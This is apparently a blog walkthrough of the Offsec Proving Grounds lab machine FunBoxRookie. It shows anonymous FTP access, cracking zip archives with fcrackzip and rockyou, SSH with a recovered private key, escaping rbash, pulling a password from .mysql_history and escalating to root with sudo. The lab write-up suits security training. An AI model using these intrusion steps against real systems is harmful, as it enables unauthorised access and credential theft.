# Offsec Proving Grounds - FunBoxRookie Walkthrough
#### Machine Details
#### Name: FunBoxRookie
#### IP address: 192.168.66.107
#### Difficulty: Easy
#### Points: 5
---
## It all began with nmap
Once the box has been started, as usual the first step is to run a scan. nmap comes to the rescue and the result is shown below.
From the scan results, there are three services running on this box; an FTP service on port 21, an SSH service on port 22 and also an HTTP service on port 80. Interestingly, the FTP service allows [anonymous login](https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol).
Before checking out the FTP service, I quickly entered the IP address of the box into a browser to see what is on the webpage and I was greeted with the following page:
I ran directory enumeration with gobuster in the background but did not obtain much information. I visited /robots.txt on the page and got this:
Awesome! We found /logs/. I proceeded quickly to access this page but to my surprise I got the page below:
## I am ANONYMOUS
At this point, I went back to the FTP server and logged in as anonymous. Listing the files on the server shows some zips files and some hidden files which I downloaded to my local machine.
I opened the welcome.msg as displayed below but did not get much information.
Opening the .@admin file gives some sort of encoded message.
The .@users file on the other hand provides much information on the next line of action.
I tried to unzip each of the zip files but they all require a password.
## Crack 'em all
Since the root user hinted that the passwords are the old ones, I proceeded to try to crack each zip file using fcrackzip and rockyou.txt wordlist. Out of the eleven zip files, I was able to crack two of them: cathrine.zip and tom.zip and extract their id_rsa files.
```
fcrackzip -u -D -v -p /usr/share/wordlists/rockyou.txt file.zip
```
## Let me in
After I obtained the id_rsa, I changed the file permission. I then tried to access SSH using cathrine id_rsa file but I kept getting a connection closed message.
```
chmod 0600 id_rsa
```
I moved to trying tom id_rsa file and I was logged into the box. From here I could read the local.txt file.
## Oh my! It's jailbreak time
One thing I noticed is that, the user tom is in a restricted shell (rbash). So I had to breakout of this shell.
```
ssh -i id_rsa tom@192.168.66.107 -t "bash --noprofile"
```
Now I can use commands such as cd. One of the first enumeraction checks I do is to find out what commands I can run as other users by running:
```
sudo -l
```
but I was prompted for a password which I don't have.
## History
I listed all files in the tom folder again and noticed there is a .mysql_history file. Opening this file, I found creds for tom (\040 represents space).
```
tom:xx11yy22!
```
Since there is no mysql service running, I proceeded to pass the password to the sudo -l command I ran earlier.
## ROOOOOOOOT!
Luckily, tom can run all commands as all users, including root, on the box. To obtain a root shell, I only need to do:
```
sudo -i
```
And BOOM! we're root!
###### tags: `offsec proving grounds` `funboxrookie` `anonymous ftp` `password reuse` `fcrackzip` `zip cracking` `bypassing restricted shells` `history`
Sign in with Wallet
Connect another wallet